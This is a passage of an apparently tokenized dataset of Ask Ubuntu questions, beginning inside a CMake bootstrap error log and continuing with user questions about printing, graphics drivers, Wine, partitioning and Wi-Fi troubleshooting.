( socket , void * , socklen_t , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , void * , unsigned int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , void * , unsigned int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , void * , unsigned int , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , void * , unsigned int , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , char * , size_t , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , char * , size_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , char * , size_t , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , char * , size_t , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , char * , int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , char * , int , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , char * , int , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , char * , int , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , char * , socklen_t , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , char * , socklen_t , int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , char * , socklen_t , unsigned int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , char * , socklen_t , unsigned int ) ( curl_cv_func_recv_test ) - failed -- performing test int recv ( socket , char * , unsigned int , int ) ( curl_cv_func_recv_test ) -- performing test int recv ( socket , char * , unsigned int , int ) ( curl_cv_func_recv_test ) - failed -- performing test curl_cv_send -- performing test curl_cv_send - success -- performing test int send ( int , const void * , size_t , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const void * , size_t , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const void * , size_t , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const void * , size_t , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const void * , int , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const void * , int , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const void * , int , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const void * , int , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const void * , socklen_t , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const void * , socklen_t , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const void * , socklen_t , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const void * , socklen_t , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const void * , unsigned int , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const void * , unsigned int , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const void * , unsigned int , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const void * , unsigned int , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , void * , size_t , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , void * , size_t , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , void * , size_t , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , void * , size_t , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , void * , int , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , void * , int , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , void * , int , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , void * , int , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , void * , socklen_t , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , void * , socklen_t , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , void * , socklen_t , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , void * , socklen_t , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , void * , unsigned int , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , void * , unsigned int , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , void * , unsigned int , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , void * , unsigned int , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , char * , size_t , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , char * , size_t , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , char * , size_t , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , char * , size_t , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , char * , int , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , char * , int , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , char * , int , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , char * , int , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , char * , socklen_t , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , char * , socklen_t , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , char * , socklen_t , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , char * , socklen_t , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , char * , unsigned int , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , char * , unsigned int , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , char * , unsigned int , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , char * , unsigned int , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const char * , size_t , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const char * , size_t , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const char * , size_t , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const char * , size_t , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const char * , int , int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const char * , int , int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const char * , int , unsigned int ) ( curl_cv_func_send_test ) -- performing test int send ( int , const char * , int , unsigned int ) ( curl_cv_func_send_test ) - failed -- performing test int send ( int , const char * , socklen_t , int ) ( curl_cv_func_send_test ) -- performing test int send ( socket , char * , int , int ) ( curl_cv_func_send_test ) -- performing test int send ( socket , char * , int , int ) ( curl_cv_func_send_test ) - failed -- found zlib : cmzlib -- found bzip2 : cmbzip2 ( found version `` 1.0.5 '' ) -- looking for bz2_bzcompressinit in cmbzip2 -- looking for bz2_bzcompressinit in cmbzip2 - not found -- performing test have_dirent_h -- performing test have_dirent_h - success -- looking for include files sys/types.h , acl/libacl.h -- looking for include files sys/types.h , acl/libacl.h - not found -- looking for include files sys/types.h , ctype.h -- looking for include files sys/types.h , ctype.h - found -- looking for 3 include files sys/types.h , ... , copyfile.h -- looking for 3 include files sys/types.h , ... , copyfile.h - not found -- looking for 3 include files sys/types.h , ... , direct.h -- looking for 3 include files sys/types.h , ... , direct.h - not found -- looking for 5 include files sys/types.h , ... , ext2fs/ext2_fs.h -- looking for 5 include files sys/types.h , ... , ext2fs/ext2_fs.h - not found -- performing test have_working_ext2_ioc_getflags -- performing test have_working_ext2_ioc_getflags - failed -- looking for 26 include files sys/types.h , ... , sys/acl.h -- looking for 26 include files sys/types.h , ... , sys/acl.h - not found -- looking for 26 include files sys/types.h , ... , sys/cdefs.h -- looking for 26 include files sys/types.h , ... , sys/cdefs.h - found -- looking for 28 include files sys/types.h , ... , sys/mkdev.h -- looking for 28 include files sys/types.h , ... , sys/mkdev.h - not found -- looking for 28 include files sys/types.h , ... , sys/mount.h -- looking for 28 include files sys/types.h , ... , sys/mount.h - not found -- looking for 32 include files sys/types.h , ... , sys/statfs.h -- looking for 43 include files sys/types.h , ... , windows.h - not found -- looking for 43 include files sys/types.h , ... , wincrypt.h -- looking for 43 include files sys/types.h , ... , wincrypt.h - not found -- looking for 43 include files sys/types.h , ... , winioctl.h -- looking for 43 include files sys/types.h , ... , winioctl.h - not found -- performing test safe_to_define_extensions -- performing test safe_to_define_extensions - success -- looking for md5init in md -- looking for md5init in md - not found -- looking for _crtsetreportmode -- looking for _crtsetreportmode - not found -- looking for chown -- looking for getpid -- looking for getpid - found -- looking for getvfsbyname -- looking for getvfsbyname - not found -- looking for lchflags -- looking for lchflags - not found -- looking for strncpy_s -- looking for strncpy_s - not found -- looking for _ctime64_s - not found -- looking for _fseeki64 -- looking for _fseeki64 - not found -- looking for _get_timezone -- looking for _get_timezone - not found -- looking for _localtime64_s -- looking for _localtime64_s - not found -- looking for _mkgmtime64 -- looking for _mkgmtime64 - not found -- looking for cygwin_conv_path -- looking for cygwin_conv_path - not found -- performing test major_in_mkdev - failed -- looking for eftype -- looking for eftype - not found -- looking for eilse -- performing test have_struct_tm___tm_gmtoff -- performing test have_struct_tm___tm_gmtoff - failed -- performing test have_struct_statfs_f_namemax -- performing test have_struct_statfs_f_namemax - failed -- performing test have_struct_stat_st_birthtime -- performing test have_struct_stat_st_birthtime - failed -- performing test have_struct_stat_st_birthtimespec_tv_nsec -- performing test have_struct_stat_st_birthtimespec_tv_nsec - failed -- performing test have_struct_stat_st_mtimespec_tv_nsec -- performing test have_struct_stat_st_mtimespec_tv_nsec - failed -- performing test have_struct_stat_st_mtim_tv_nsec -- performing test have_struct_stat_st_mtim_tv_nsec - success -- performing test have_struct_stat_st_mtime_n -- performing test have_struct_stat_st_mtime_n - failed -- performing test have_struct_stat_st_umtime -- performing test have_struct_stat_st_umtime - failed -- performing test have_struct_stat_st_mtime_usec -- performing test have_struct_stat_st_mtime_usec - failed -- performing test have_struct_stat_st_blksize -- performing test have_struct_stat_st_blksize - success -- performing test have_struct_stat_st_flags -- performing test have_struct_stat_st_flags - failed -- performing test have_struct_statvfs_f_iosize -- performing test have_struct_statvfs_f_iosize - failed -- checking _file_offset_bits for large files -- checking _file_offset_bits for large files - not needed -- checking support for archive_crypto_md5_libc -- checking support for archive_crypto_md5_libc -- not found -- checking support for archive_crypto_rmd160_libc -- checking support for archive_crypto_rmd160_libc -- not found -- checking support for archive_crypto_sha1_libc -- checking support for archive_crypto_sha1_libc -- not found -- checking support for archive_crypto_sha256_libc -- checking support for archive_crypto_sha256_libc -- not found -- checking support for archive_crypto_sha384_libc -- checking support for archive_crypto_sha384_libc -- not found -- checking support for archive_crypto_sha512_libc -- checking support for archive_crypto_sha512_libc -- not found -- checking support for archive_crypto_sha256_libc2 -- checking support for archive_crypto_sha256_libc2 -- not found -- checking support for archive_crypto_sha384_libc2 -- checking support for archive_crypto_sha384_libc2 -- not found -- checking support for archive_crypto_sha512_libc2 -- checking support for archive_crypto_sha512_libc2 -- not found -- checking support for archive_crypto_sha256_libc3 -- checking support for archive_crypto_sha256_libc3 -- not found -- checking support for archive_crypto_sha384_libc3 -- checking support for archive_crypto_sha384_libc3 -- not found -- checking support for archive_crypto_sha512_libc3 -- checking support for archive_crypto_sha512_libc3 -- not found -- checking support for archive_crypto_md5_libsystem -- checking support for archive_crypto_md5_libsystem -- not found -- checking support for archive_crypto_sha1_libsystem -- checking support for archive_crypto_sha1_libsystem -- not found -- checking support for archive_crypto_sha256_libsystem -- checking support for archive_crypto_sha256_libsystem -- not found -- checking support for archive_crypto_sha384_libsystem -- checking support for archive_crypto_sha384_libsystem -- not found -- checking support for archive_crypto_sha512_libsystem -- checking support for archive_crypto_sha512_libsystem -- not found -- checking support for archive_crypto_md5_libmd -- checking support for archive_crypto_md5_libmd -- not found -- checking support for archive_crypto_rmd160_libmd -- checking support for archive_crypto_rmd160_libmd -- not found -- checking support for archive_crypto_sha1_libmd -- checking support for archive_crypto_sha1_libmd -- not found -- checking support for archive_crypto_sha256_libmd -- checking support for archive_crypto_sha256_libmd -- not found -- checking support for archive_crypto_sha512_libmd -- checking support for archive_crypto_sha512_libmd -- not found -- check if the system is big endian -- searching 16 bit integer -- check size of unsigned short -- check size of unsigned short - done -- using unsigned short -- check if the system is big endian - little endian -- looking for elf.h -- looking for elf.h - found -- looking for a fortran compiler -- looking for a fortran compiler - /usr/bin/f95 -- looking for q_ws_x11 -- looking for q_ws_x11 - not found -- looking for q_ws_win -- looking for q_ws_win - not found -- looking for q_ws_qws -- looking for q_ws_qws - not found -- looking for q_ws_mac -- looking for q_ws_mac - not found -- found unsuitable qt version `` 5.0.1 '' from /usr/bin/qmake -- performing test run_pic_test -- performing test run_pic_test - success -- configuring incomplete , errors occurred ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - error when bootstrapping cmake : problem while running initial cmake -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -
319948	printing multiple files from nautilus	i tried to print multiple files . however not a single solution posted on the net works . either a right click using nautilus actions as described in multiple posts using the lpr command in the terminal and dragging files from nautilus ( here printque opens but files are reld and when releasebutton is pressed the window closes without action . with a script as posted here : printing a file from the right-click context menu in nautilus the only method that works is combining pdf files in pdfmod to a new large file , saving it and printing it . not very elegant . since no option of multiple work - could the community have a fresh look on rightclick printing from nautilus ?
319950	cant start up windows	why i posted on askubuntu ? -banned from superuser and have to fix with ubuntu . problem : i get : file \boot\bcb status 0xc000000f i need the windows disk i do not have it . i need to fix this through ubuntu . i tryed a windows recovery disk , it did not regognise it . ubuntu is 12.06 desktop on bootable flashdrive windows 7 64 bit home premium .
319951	recursive grep fails for *.c files	i tried to recursively search a pattern in all the .c files in the following way > grep -lr search-pattern *.c but got this as the output > grep : *.c : no such file or directory when i use this : > grep -lr search-pattern * i get plenty of . c files in the directories with the pattern . what is wrong with the earlier expression ?
319959	how to get ubuntu to associate nvidia graphics with hdmi port ?	i am relatively new to ubuntu and i am having problems with my hdmi port . my laptop is an asus n56vm with hybrid graphics : intel hd 4000 ( intergrated ) and nvidia geforce gt 630m 2gb . i have a multiple-monitor setup , one plugged into the hmdi port , one in the vga and the laptop display . when running ubuntu the one plugged into the hdmi occasionally works and when it does the display does n't run smoothly and is very glitchy . ( the vga and laptop display work fine ) when running windows 7 the nvidia graphics card runs the monitor plugged into the hdmi , where the intel runs the laptop display and the vga monitor . ( everything works fine on windows 7 ) i believe that the problem is due to the lack of the lack of a driver or software that associates the hdmi port with the nvidia graphics card . i have looked into it and tried installing a few drivers but this has only caused more problems and has not fixed the issue . does anyone know how to solve this problem ?
319964	nteflix streams really choppy	i installed netflix on edubuntu 12.04lts . it will stream movies but is real choppy . i know its not my comp unable to handle because i use to have windows on here and it ran fine . is there any fixes to get the choppiness to stop
319966	migrating from windows : will mozyhome and itunes be accessible ?	i am thinking of buying a new laptop with ubuntu pre-installed . i have backed up everything from my current comuter to the cloud using mozyhome . i would like to know will downloading all my files again onto my new ubuntu machine work ? will i somehow be able to play all of the itunes music files which i have backed up ? i do n't want to have to reinstall itunes , or any other of the bloated corporate software i am trying to get away from with this ( possible ) switch ...
319972	how to use palaver on ubuntu 13.04 32bit ?	i tried a lot to install palaver speech recognition software . but i have failed many a time . but eventually i installed it . however , i can not use it ! that 's the problem . tell me what to do ?
319976	creating shortcut for feed the beast/minecraft	first off , i am very new to ubuntu , and have installed 13.04 as my sole os to force myself to try and learn a bit . however , i have run into an issue creating a unity shortcut . i have tried to create a .desktop directly to the .jar , but that does not actually open , just thinks for a minute . code i used is : ` [ desktop entry ] name=feed the beast exec=/home/richard/.ftblauncher/ftb_launcher.jar icon=/home/richard/.ftblauncher/ftb.png terminal=false type=application startupnotify=true i have also tried to create a shell for the .jar , then changed the .desktop to reflect the change . the .sh code i used is : # ! /bin/sh bindir= '' $ ( dirname `` $ ( readlink -fn `` $ 0 '' ) '' ) '' cd `` $ bindir '' export ld_library_path= '' /usr/lib/jvm/java-7-openjdk-amd64/jre/lib '' java -xms2g -xmx3g -jar ~/.ftblauncher/ftb_launcher.jar the .sh runs fine when run from the terminal , but the .desktop tells me `` there was an error launching the application '' please help , i 'll post anything else you guys need . and yes , all are set to `` allow as executable '' , however i can not set java 7 as default for the .jar
319977	can i create a setup file out of already installed files	i have used android phone and was very much impressed by knowing that it is based on linux environment and i got an application there named `` super manager '' from play store , it has many features but my favorite is that it can convert installed apps into .apk files and using that i can install it on other phones as well either through memory card or through backup , so i was wondering can the same feature would be available in ubuntu , because i have other pc which does n't has internet on it so i ca n't download applications directly from `` ubuntu software center '' . i am pretty new in linux environment as i have been using windows so long , so asked this just out of curiosity . help will be appreciable alot . thanks a lot friends
319978	ubuntu haswell hd4600 driver not loading	i have a lenovo y410p . the screen starts with blank which i fixed by setting nomodeset in boot settings . but if i check the xorg logs the intel driver or card is not being recognized and the system runs as gaallium 3d ( llvm ) . pasting my /var/log/xorg.0.log [ 4.000 ] x.org x server 1.13.4 release date : 2013-04-17 [ 4.000 ] x protocol version 11 , revision 0 [ 4.000 ] build operating system : linux 2.6.24-32-xen x86_64 ubuntu [ 4.000 ] current operating system : linux vipul-lenovo-ideapad-y410p 3.10.1-031001-generic # 201307131550 smp sat jul 13 19:51:31 utc 2013 x86_64 [ 4.000 ] kernel command line : boot_image=/vmlinuz-3.10.1-031001-generic root=uuid=aea2b405-1ccd-4da8-b7dd-2190e5843e7b ro nomodeset quiet splash pcie_aspm=force i915.lvds_downclock=1 drm.vblankoffdelay=1 i915.semaphores=1 vt.handoff=7 [ 4.000 ] build date : 08 may 2013 02:34:03pm [ 4.000 ] xorg-server 2:1.13.4~git20130508+server-1.13-branch.10c42f57-0ubuntu0ricotz~raring ( for technical support please see http : //www.ubuntu.com/support ) [ 4.000 ] current version of pixman : 0.28.2 [ 4.000 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 4.000 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 4.001 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sun jul 14 10:32:52 2013 [ 4.002 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 4.002 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 4.003 ] ( == ) no layout section . using the first screen section . [ 4.003 ] ( == ) no screen section available . using defaults . [ 4.003 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 4.003 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 4.003 ] ( == ) no device specified for screen `` default screen section '' . using the first device section listed . [ 4.003 ] ( ** ) | | -- > device `` hd graphics 4600 , haswell mobile ( gt3 ) '' [ 4.003 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 4.003 ] ( == ) automatically adding devices [ 4.003 ] ( == ) automatically enabling devices [ 4.003 ] ( == ) automatically adding gpu devices [ 4.006 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 4.006 ] entry deleted from font path . [ 4.006 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 4.006 ] entry deleted from font path . [ 4.006 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 4.006 ] entry deleted from font path . [ 4.006 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 4.006 ] entry deleted from font path . [ 4.006 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 4.006 ] entry deleted from font path . [ 4.006 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 4.006 ] entry deleted from font path . [ 4.006 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 4.006 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 4.006 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 4.006 ] ( ii ) loader magic : 0x7f7051380d20 [ 4.006 ] ( ii ) module abi versions : [ 4.006 ] x.org ansi c emulation : 0.4 [ 4.006 ] x.org video driver : 13.1 [ 4.006 ] x.org xinput driver : 18.0 [ 4.006 ] x.org server extension : 7.0 [ 4.007 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0416:17aa:3801 rev 6 , mem @ 0xc2000000/4194304 , 0xb0000000/268435456 , i/o @ 0x00005000/64 [ 4.007 ] ( -- ) pci : ( 0:1:0:0 ) 10de:0fe4:17aa:3801 rev 161 , mem @ 0xc0000000/16777216 , 0x90000000/268435456 , 0xa0000000/33554432 , i/o @ 0x00004000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 4.007 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 4.008 ] initializing built-in extension generic event extension [ 4.008 ] initializing built-in extension shape [ 4.008 ] initializing built-in extension mit-shm [ 4.008 ] initializing built-in extension xinputextension [ 4.008 ] initializing built-in extension xtest [ 4.008 ] initializing built-in extension big-requests [ 4.008 ] initializing built-in extension sync [ 4.008 ] initializing built-in extension xkeyboard [ 4.008 ] initializing built-in extension xc-misc [ 4.008 ] initializing built-in extension security [ 4.008 ] initializing built-in extension xinerama [ 4.008 ] initializing built-in extension xfixes [ 4.008 ] initializing built-in extension render [ 4.008 ] initializing built-in extension randr [ 4.008 ] initializing built-in extension composite [ 4.008 ] initializing built-in extension damage [ 4.008 ] initializing built-in extension mit-screen-saver [ 4.008 ] initializing built-in extension double-buffer [ 4.008 ] initializing built-in extension record [ 4.008 ] initializing built-in extension dpms [ 4.008 ] initializing built-in extension x-resource [ 4.008 ] initializing built-in extension xvideo [ 4.008 ] initializing built-in extension xvideo-motioncompensation [ 4.008 ] initializing built-in extension selinux [ 4.008 ] initializing built-in extension xfree86-vidmodeextension [ 4.008 ] initializing built-in extension xfree86-dga [ 4.008 ] initializing built-in extension xfree86-dri [ 4.008 ] initializing built-in extension dri2 [ 4.008 ] ( ii ) loadmodule : `` glx '' [ 4.010 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 4.011 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 4.011 ] compiled for 1.13.4 , module version = 1.0.0 [ 4.011 ] abi class : x.org server extension , version 7.0 [ 4.011 ] ( == ) aiglx enabled [ 4.011 ] loading extension glx [ 4.011 ] ( ii ) loadmodule : `` intel '' [ 4.011 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 4.013 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 4.013 ] compiled for 1.13.4 , module version = 2.21.11 [ 4.013 ] module class : x.org video driver [ 4.013 ] abi class : x.org video driver , version 13.1 [ 4.013 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 , b43 , clarkdale , arrandale , sandybridge desktop ( gt1 ) , sandybridge desktop ( gt2 ) , sandybridge desktop ( gt2+ ) , sandybridge mobile ( gt1 ) , sandybridge mobile ( gt2 ) , sandybridge mobile ( gt2+ ) , sandybridge server , ivybridge mobile ( gt1 ) , ivybridge mobile ( gt2 ) , ivybridge desktop ( gt1 ) , ivybridge desktop ( gt2 ) , ivybridge server , ivybridge server ( gt2 ) , hd graphics , hd graphics 4600 , haswell desktop ( gt3 ) , hd graphics , hd graphics 4600 , haswell mobile ( gt3 ) , hd graphics , hd graphics p4600/p4700 , haswell server ( gt3 ) , haswell ( gt1 ) , haswell ( gt2 ) , haswell ( gt3 ) , hd graphics , haswell ( gt2 ) , haswell ( gt3 ) , haswell sdv desktop ( gt1 ) , haswell sdv desktop ( gt2 ) , haswell sdv desktop ( gt3 ) , haswell sdv mobile ( gt1 ) , haswell sdv mobile ( gt2 ) , haswell sdv mobile ( gt3 ) , haswell sdv server ( gt1 ) , haswell sdv server ( gt2 ) , haswell sdv server ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell sdv ( gt1 ) , haswell sdv ( gt2 ) , haswell sdv ( gt3 ) , haswell ult desktop ( gt1 ) , haswell ult desktop ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4400 , hd graphics 5000 , haswell ult server ( gt1 ) , haswell ult server ( gt2 ) , iris ( tm ) graphics 5100 , haswell ult ( gt1 ) , haswell ult ( gt2 ) , iris ( tm ) graphics 5100 , hd graphics , hd graphics 4200 , iris ( tm ) graphics 5100 , haswell crw desktop ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw mobile ( gt1 ) , hd graphics 4600 , iris ( tm ) pro graphics 5200 , haswell crw server ( gt1 ) , haswell crw server ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , haswell crw ( gt1 ) , haswell crw ( gt2 ) , iris ( tm ) pro graphics 5200 , valleyview po board [ 4.014 ] ( ++ ) using vt number 7 [ 4.015 ] ( ee ) no devices detected . [ 4.015 ] ( == ) matched intel as autoconfigured driver 0 [ 4.015 ] ( == ) matched vesa as autoconfigured driver 1 [ 4.015 ] ( == ) matched modesetting as autoconfigured driver 2 [ 4.015 ] ( == ) matched fbdev as autoconfigured driver 3 [ 4.015 ] ( == ) assigned the driver to the xf86configlayout [ 4.015 ] ( ii ) loadmodule : `` intel '' [ 4.015 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 4.015 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 4.015 ] compiled for 1.13.4 , module version = 2.21.11 [ 4.015 ] module class : x.org video driver [ 4.015 ] abi class : x.org video driver , version 13.1 [ 4.015 ] ( ii ) unloadmodule : `` intel '' [ 4.015 ] ( ii ) unloading intel [ 4.015 ] ( ii ) failed to load module `` intel '' ( already loaded , 32624 ) [ 4.015 ] ( ii ) loadmodule : `` vesa '' [ 4.015 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 4.015 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 4.015 ] compiled for 1.12.99.902 , module version = 2.3.2
319979	how can i collect bug data to be submitted on another machine ?	i know i can file a bug report on the local machine by running ubuntu-bug . but what about when i have a bug on another computer elsewhere so that it 's not convenient to get to it physically to file a report there ? can i use ubuntu 's bug reporting tools to gather data about the bug remotely , transfer that data to my local machine and submit a bug report here with the data from the other system ?
319983	problem with installation of db2	i have a problem with installation of ibm db2 , it tells me it did n't find libpam.so . is there a package i have to install to correct the problem ? i used to find a solution on the web but i found nothing that managed to correct my problem .
319988	simple wine issue	i have a wine issue . i am trying to install wine with 'ubuntu software center ' but it wont let me . i recieve this pop-up and do not know what it means . please help . package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.10ubuntu1 is to be installed depends : libc6 ( > = 2.14 ) but 2.17-0ubuntu5 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu5 ) but 1.4.1-0ubuntu5 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu5 ) but it is a virtual package any help would be great
319992	dual booting hp pavilion g6	i 'm a windows 8 user . i was wondering if there 's any way to dual boot my hp pavilion g6 2237ez with windows 8 and ubuntu . i just wanted to try ubuntu and see for myself what 's so special about ubuntu . thanks in advance : )
319994	ubuntu 12.10 : wifi connected but not working ( working on other devices )	all is said in the title . i 'm on ubuntu 12.10 . i went on holidays for one month , where i upgraded from 12.04 to 12.10 . i just came home today , i turned my computer on , the wifi connected ( same password , same settings as before , everything ) , but the internet does n't work whatsoever ( ca n't go to any website via firefox , ca n't ping google , etc . ) i seem to be able to ping my own ip adress though , if that helps . thanks a lot .
320014	why a new file with ~ added in extension is created whenever i create a file	i created a file in ubuntu command prompt like this $ gedit first_file.txt after editing and saving the file when do ls on command prompt i can see an additional file created first_file.txt~ my question what is this file and why it is created ? will it ok to tell ubuntu not to created these files and how ?
320015	the last two times i have updated from the software updater , i have had to reinstall my graphics drivers and restart unity	the last two times i have updated from the software updater , i have had to reinstall my graphics drivers and restart unity . the first time it happened it took quite a long time for me to find out how to get everything back . i am unfamiliar with ubuntu and unity and i 'm wondering why i had to do this . should i turn off updates all together ? are there specific updates that i should avoid ? for complete reference . i will put what i did below to get everything back up and running . i do n't know if all of it is necessary , but i know it gets me back to where i was if i do it this way : 1 ) the machine comes up with nothing but a bad resolution and a mouse pointer . so i kill the xserver by `` ctrl + alt + f1 '' 2 ) i do the following so i can install the nvidia drivers again sudo service lightdm stop sudo sh nvidia-linux-x86_64-319.23.run 3 ) i go through nvidia 's rigamarole and reinstall everything 4 ) i restart and the resolution is clearly where it should be but i 'm still missing unity so i followed some instructions i found on this site menu bar and launcher missing in ubuntu 13.04 dconf reset -f /org/compiz/ unity -- reset-icons & disown 5 ) the terminal i used to do step 4 obviously disappears but the unity bar never comes back up 6 ) that step 4 must do something funky to the metacity stuff cause i lose control over my terminal boxes so i run metacity and get them back 7 ) i restart my machine and everything is `` near '' back to normal ( i lose all of my icons that i previously had on the launcher and gain some that i long ago got rid of ) so my main concern here is i do n't want to do this every time the software updater has an update . is this a common problem ?
320016	ubuntu 13.0.4 install/partition problem	i am not completely proficient when it comes to ubuntu ... yet . when installing ubuntu 12 , when it comes to drive partition it offers to run it alongside windows , in 13.0.4 , it offers to delete all other os 's , or encrypt the new ubuntu installation for security , or use lvm with the new ubuntu installation , and lastly , something else . something else just confuses me . any tutorials or ideas ? thanks .
